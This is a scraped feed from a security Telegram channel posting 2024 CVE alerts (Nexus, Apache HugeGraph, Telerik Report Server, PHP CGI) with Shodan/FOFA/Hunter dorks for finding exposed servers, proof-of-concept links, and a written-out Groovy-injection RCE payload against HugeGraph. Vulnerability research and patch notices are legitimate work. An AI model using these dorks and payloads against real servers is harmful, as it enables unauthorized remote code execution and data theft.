Brut Security – Telegram
Brut Security
14.7K subscribers
918 photos
73 videos
287 files
972 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨

⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.

👉Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"

POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

💥POC: https://lnkd.in/g_v4h7Cg

👉Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.noscript:"HugeGraph"
🤯8
This media is not supported in your browser
VIEW IN TELEGRAM
📢Use This Extensions, it will help you to Extract all domains From any website.

🔸Link Extractor: https://link-extractor.cssnr.com
🔸Link Gopher: https://github.com/az0/linkgopher
👍2🤯2
🚨CVE-2024-27348: RCE in Apache HugeGraph-Server.

📢Remedy: Upgrade to version 1.3.0 to mitigate.

😉Payload:
{"gremlin":"def result = \"uname -a\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(\"BrutSecurity\"+ result);"
}


👌Video: https://youtu.be/32cyeCd4DEc
👍1
🚨Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)🚨

📢PoC: https://github.com/sinsinology/CVE-2024-4358

Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/

👉Dorks:
🔸Hunter: /product.name="Telerik report server"
🔸FOFA: app="Telerik-Report-Server"
🔸SHODAN: http.noscript:"Telerik report server"
👏2
Brut Security pinned Deleted message
Media is too big
VIEW IN TELEGRAM
🚨Android SSL Pinning Bypass using Noxer🚨

👉Automate your Android penetration testing lab setup using Nox Emulator. Noxer is a powerful Python noscript designed for automating Android penetration testing tasks within the Nox Player emulator. It simplifies setup, enhances stability, manages Frida Server, removes unwanted bloatware, integrates BurpSuite certificates, and much more!

🔗Noxer: https://buff.ly/4b0gxM4
🔥4
cve_2024_4577.py
828 B
🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
🚨CVE-2024-4577: PHP CGI Argument Injection Vulnerability🚨

Dorks:
🔸Hunter: header.server="PHP"
🔸FOFA: server="PHP"
🔸SHODAN: server: PHP
🤯5👍2🔥2
Last Call! Hurry Up
🤣21🤓3😐2
TestCases.pdf
711.3 KB
👍2🐳1
Which of the following is used for banner grabbing?
Anonymous Quiz
49%
Telnet
12%
FTP
19%
SSH
21%
Wireshark
👍1
Brut Security pinned Deleted message
Complete_Shodan_Guide.pdf
4.3 MB
🔥4👍2